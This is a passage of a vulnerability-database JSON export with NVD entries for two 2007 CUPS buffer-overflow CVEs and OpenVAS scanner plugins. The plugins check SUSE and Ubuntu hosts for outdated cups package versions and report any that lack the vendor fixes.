{"cve": [{"lastseen": "2021-02-02T05:31:27", "description": "Buffer overflow in CUPS in Apple Mac OS X 10.4.11 allows local admin users to execute arbitrary code via a crafted URI to the CUPS service.", "edition": 4, "cvss3": {}, "published": "2007-12-19T21:46:00", "title": "CVE-2007-5848", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2007-5848"], "modified": "2018-10-15T21:46:00", "cpe": ["cpe:/o:apple:mac_os_x:10.4.11"], "id": "CVE-2007-5848", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-5848", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:apple:mac_os_x:10.4.11:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T05:31:28", "description": "Integer underflow in the asn1_get_string function in the SNMP back end (backend/snmp.c) for CUPS 1.2 through 1.3.4 allows remote attackers to execute arbitrary code via a crafted SNMP response that triggers a stack-based buffer overflow.", "edition": 4, "cvss3": {}, "published": "2007-12-19T21:46:00", "title": "CVE-2007-5849", "type": "cve", "cwe": ["CWE-189"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2007-5849"], "modified": "2017-07-29T01:33:00", "cpe": ["cpe:/a:easy_software_products:cups:1.3.3", "cpe:/a:easy_software_products:cups:1.2.10", "cpe:/a:easy_software_products:cups:1.2.4", "cpe:/a:easy_software_products:cups:1.2.9", "cpe:/a:easy_software_products:cups:1.2.12"], "id": "CVE-2007-5849", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-5849", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:easy_software_products:cups:1.2.12:*:*:*:*:*:*:*", "cpe:2.3:a:easy_software_products:cups:1.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:easy_software_products:cups:1.2.10:*:*:*:*:*:*:*", "cpe:2.3:a:easy_software_products:cups:1.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:easy_software_products:cups:1.2.9:*:*:*:*:*:*:*"]}], "openvas": [{"lastseen": "2017-12-12T11:19:50", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-5848", "CVE-2007-5849"], "description": "Check for the Version of cups", "modified": "2017-12-08T00:00:00", "published": "2009-01-23T00:00:00", "id": "OPENVAS:850039", "href": "http://plugins.openvas.org/nasl.php?oid=850039", "type": "openvas", "title": "SuSE Update for cups SUSE-SA:2008:002", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_suse_2008_002.nasl 8050 2017-12-08 09:34:29Z santu $\n#\n# SuSE Update for cups SUSE-SA:2008:002\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Various security issue have been fixed in the CUPS print server.\n\n - CVE-2007-5848: A buffer overflow that can be exploited by users that are allowed to configure CUPS.\n\n - CVE-2007-5849: Additionally a buffer overflow in the SNMP backend of CUPS was fixed that allowed\n remote attackers to execute arbitrary code by sending specially crafted SNMP responses.\n This requires a local administrator to trigger a SNMP request and the attacker then injecting\n a response.\n\n The second vulnerability affects openSUSE 10.2 and 10.3 only.\";\n\ntag_impact = \"remote code execution\";\ntag_affected = \"cups on SUSE LINUX 10.1, openSUSE 10.2, openSUSE 10.3, SUSE SLES 9, Novell Linux Desktop 9, Open Enterprise Server, Novell Linux POS 9, SUSE Linux Enterprise Desktop 10 SP1, SUSE Linux Enterprise Server 10 SP1\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_id(850039);\n script_version(\"$Revision: 8050 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-08 10:34:29 +0100 (Fri, 08 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-01-23 16:44:26 +0100 (Fri, 23 Jan 2009)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"SUSE-SA\", value: \"2008-002\");\n script_cve_id(\"CVE-2007-5848\", \"CVE-2007-5849\");\n script_name( \"SuSE Update for cups SUSE-SA:2008:002\");\n\n script_summary(\"Check for the Version of cups\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"openSUSE10.3\")\n{\n\n if ((res = isrpmvuln(pkg:\"cups\", rpm:\"cups~1.2.12~22.6\", rls:\"openSUSE10.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups-client\", rpm:\"cups-client~1.2.12~22.6\", rls:\"openSUSE10.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups-devel\", rpm:\"cups-devel~1.2.12~22.6\", rls:\"openSUSE10.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups-libs\", rpm:\"cups-libs~1.2.12~22.6\", rls:\"openSUSE10.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups-libs-32bit\", rpm:\"cups-libs-32bit~1.2.12~22.6\", rls:\"openSUSE10.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"openSUSE10.2\")\n{\n\n if ((res = isrpmvuln(pkg:\"cups\", rpm:\"cups~1.2.7~12.9\", rls:\"openSUSE10.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups-client\", rpm:\"cups-client~1.2.7~12.9\", rls:\"openSUSE10.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups-devel\", rpm:\"cups-devel~1.2.7~12.9\", rls:\"openSUSE10.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups-libs\", rpm:\"cups-libs~1.2.7~12.9\", rls:\"openSUSE10.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups-libs-32bit\", rpm:\"cups-libs-32bit~1.2.7~12.9\", rls:\"openSUSE10.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"NLDk9\")\n{\n\n if ((res = isrpmvuln(pkg:\"cups\", rpm:\"cups~1.1.20~108.46\", rls:\"NLDk9\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups-client\", rpm:\"cups-client~1.1.20~108.46\", rls:\"NLDk9\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups-devel\", rpm:\"cups-devel~1.1.20~108.46\", rls:\"NLDk9\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups-libs\", rpm:\"cups-libs~1.1.20~108.46\", rls:\"NLDk9\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups\", rpm:\"cups~1.1.23~40.35\", rls:\"NLDk9\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups-client\", rpm:\"cups-client~1.1.23~40.35\", rls:\"NLDk9\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups-devel\", rpm:\"cups-devel~1.1.23~40.35\", rls:\"NLDk9\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups-libs\", rpm:\"cups-libs~1.1.23~40.35\", rls:\"NLDk9\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups-libs-32bit\", rpm:\"cups-libs-32bit~1.1.23~40.35\", rls:\"NLDk9\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"NLPOS9\")\n{\n\n if ((res = isrpmvuln(pkg:\"cups\", rpm:\"cups~1.1.20~108.46\", rls:\"NLPOS9\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups-client\", rpm:\"cups-client~1.1.20~108.46\", rls:\"NLPOS9\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups-devel\", rpm:\"cups-devel~1.1.20~108.46\", rls:\"NLPOS9\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups-libs\", rpm:\"cups-libs~1.1.20~108.46\", rls:\"NLPOS9\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups\", rpm:\"cups~1.1.23~40.35\", rls:\"NLPOS9\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups-client\", rpm:\"cups-client~1.1.23~40.35\", rls:\"NLPOS9\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups-devel\", rpm:\"cups-devel~1.1.23~40.35\", rls:\"NLPOS9\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups-libs\", rpm:\"cups-libs~1.1.23~40.35\", rls:\"NLPOS9\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups-libs-32bit\", rpm:\"cups-libs-32bit~1.1.23~40.35\", rls:\"NLPOS9\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"OES\")\n{\n\n if ((res = isrpmvuln(pkg:\"cups\", rpm:\"cups~1.1.20~108.46\", rls:\"OES\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups-client\", rpm:\"cups-client~1.1.20~108.46\", rls:\"OES\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups-devel\", rpm:\"cups-devel~1.1.20~108.46\", rls:\"OES\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups-libs\", rpm:\"cups-libs~1.1.20~108.46\", rls:\"OES\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups\", rpm:\"cups~1.1.23~40.35\", rls:\"OES\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups-client\", rpm:\"cups-client~1.1.23~40.35\", rls:\"OES\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups-devel\", rpm:\"cups-devel~1.1.23~40.35\", rls:\"OES\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups-libs\", rpm:\"cups-libs~1.1.23~40.35\", rls:\"OES\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups-libs-32bit\", rpm:\"cups-libs-32bit~1.1.23~40.35\", rls:\"OES\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"SLES9\")\n{\n\n if ((res = isrpmvuln(pkg:\"cups\", rpm:\"cups~1.1.20~108.46\", rls:\"SLES9\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups-client\", rpm:\"cups-client~1.1.20~108.46\", rls:\"SLES9\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups-devel\", rpm:\"cups-devel~1.1.20~108.46\", rls:\"SLES9\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups-libs\", rpm:\"cups-libs~1.1.20~108.46\", rls:\"SLES9\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups\", rpm:\"cups~1.1.23~40.35\", rls:\"SLES9\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups-client\", rpm:\"cups-client~1.1.23~40.35\", rls:\"SLES9\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups-devel\", rpm:\"cups-devel~1.1.23~40.35\", rls:\"SLES9\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups-libs\", rpm:\"cups-libs~1.1.23~40.35\", rls:\"SLES9\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups-libs-32bit\", rpm:\"cups-libs-32bit~1.1.23~40.35\", rls:\"SLES9\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"LES10SP1\")\n{\n\n if ((res = isrpmvuln(pkg:\"cups\", rpm:\"cups~1.1.20~108.46\", rls:\"LES10SP1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups-client\", rpm:\"cups-client~1.1.20~108.46\", rls:\"LES10SP1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups-devel\", rpm:\"cups-devel~1.1.20~108.46\", rls:\"LES10SP1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups-libs\", rpm:\"cups-libs~1.1.20~108.46\", rls:\"LES10SP1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups\", rpm:\"cups~1.1.23~40.35\", rls:\"LES10SP1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups-client\", rpm:\"cups-client~1.1.23~40.35\", rls:\"LES10SP1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups-devel\", rpm:\"cups-devel~1.1.23~40.35\", rls:\"LES10SP1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups-libs\", rpm:\"cups-libs~1.1.23~40.35\", rls:\"LES10SP1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups-libs-32bit\", rpm:\"cups-libs-32bit~1.1.23~40.35\", rls:\"LES10SP1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"SLESDk10SP1\")\n{\n\n if ((res = isrpmvuln(pkg:\"cups\", rpm:\"cups~1.1.20~108.46\", rls:\"SLESDk10SP1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups-client\", rpm:\"cups-client~1.1.20~108.46\", rls:\"SLESDk10SP1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups-devel\", rpm:\"cups-devel~1.1.20~108.46\", rls:\"SLESDk10SP1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups-libs\", rpm:\"cups-libs~1.1.20~108.46\", rls:\"SLESDk10SP1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups\", rpm:\"cups~1.1.23~40.35\", rls:\"SLESDk10SP1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups-client\", rpm:\"cups-client~1.1.23~40.35\", rls:\"SLESDk10SP1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups-devel\", rpm:\"cups-devel~1.1.23~40.35\", rls:\"SLESDk10SP1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups-libs\", rpm:\"cups-libs~1.1.23~40.35\", rls:\"SLESDk10SP1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups-libs-32bit\", rpm:\"cups-libs-32bit~1.1.23~40.35\", rls:\"SLESDk10SP1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"SL10.1\")\n{\n\n if ((res = isrpmvuln(pkg:\"cups\", rpm:\"cups~1.1.23~40.35\", rls:\"SL10.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups-client\", rpm:\"cups-client~1.1.23~40.35\", rls:\"SL10.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups-devel\", rpm:\"cups-devel~1.1.23~40.35\", rls:\"SL10.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups-libs\", rpm:\"cups-libs~1.1.23~40.35\", rls:\"SL10.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:37:59", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-5848"], "description": "The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n cups\n cups-devel\n cups-client\n cups-libs\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5010724 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/", "modified": "2018-04-06T00:00:00", "published": "2009-10-10T00:00:00", "id": "OPENVAS:136141256231065473", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231065473", "type": "openvas", "title": "SLES9: Security update for cups", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: sles9p5010724.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Security update for cups\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n cups\n cups-devel\n cups-client\n cups-libs\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5010724 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/\";\n\ntag_solution = \"Please install the updates provided by SuSE.\";\n \nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.65473\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-10 16:11:46 +0200 (Sat, 10 Oct 2009)\");\n script_cve_id(\"CVE-2007-5848\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"SLES9: Security update for cups\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse_sles\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"cups\", rpm:\"cups~1.1.20~108.46\", rls:\"SLES9.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-26T08:55:27", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-5848"], "description": "The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n cups\n cups-devel\n cups-client\n cups-libs\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5010724 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/", "modified": "2017-07-11T00:00:00", "published": "2009-10-10T00:00:00", "id": "OPENVAS:65473", "href": "http://plugins.openvas.org/nasl.php?oid=65473", "type": "openvas", "title": "SLES9: Security update for cups", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: sles9p5010724.nasl 6666 2017-07-11 13:13:36Z cfischer $\n# Description: Security update for cups\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n cups\n cups-devel\n cups-client\n cups-libs\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5010724 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/\";\n\ntag_solution = \"Please install the updates provided by SuSE.\";\n \nif(description)\n{\n script_id(65473);\n script_version(\"$Revision: 6666 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-11 15:13:36 +0200 (Tue, 11 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-10 16:11:46 +0200 (Sat, 10 Oct 2009)\");\n script_cve_id(\"CVE-2007-5848\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"SLES9: Security update for cups\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse_sles\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"cups\", rpm:\"cups~1.1.20~108.46\", rls:\"SLES9.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-12-04T11:27:53", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-6358", "CVE-2007-5849"], "description": "Ubuntu Update for Linux kernel vulnerabilities USN-563-1", "modified": "2017-12-01T00:00:00", "published": "2009-03-23T00:00:00", "id": "OPENVAS:840232", "href": "http://plugins.openvas.org/nasl.php?oid=840232", "type": "openvas", "title": "Ubuntu Update for cupsys vulnerabilities USN-563-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_563_1.nasl 7969 2017-12-01 09:23:16Z santu $\n#\n# Ubuntu Update for cupsys vulnerabilities USN-563-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Wei Wang discovered that the SNMP discovery backend did not correctly\n calculate the length of strings. If a user were tricked into scanning\n for printers, a remote attacker could send a specially crafted packet\n and possibly execute arbitrary code.\n\n Elias Pipping discovered that temporary files were not handled safely\n in certain situations when converting PDF to PS. A local attacker could\n cause a denial of service.\";\n\ntag_summary = \"Ubuntu Update for Linux kernel vulnerabilities USN-563-1\";\ntag_affected = \"cupsys vulnerabilities on Ubuntu 6.06 LTS ,\n Ubuntu 6.10 ,\n Ubuntu 7.04 ,\n Ubuntu 7.10\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name: 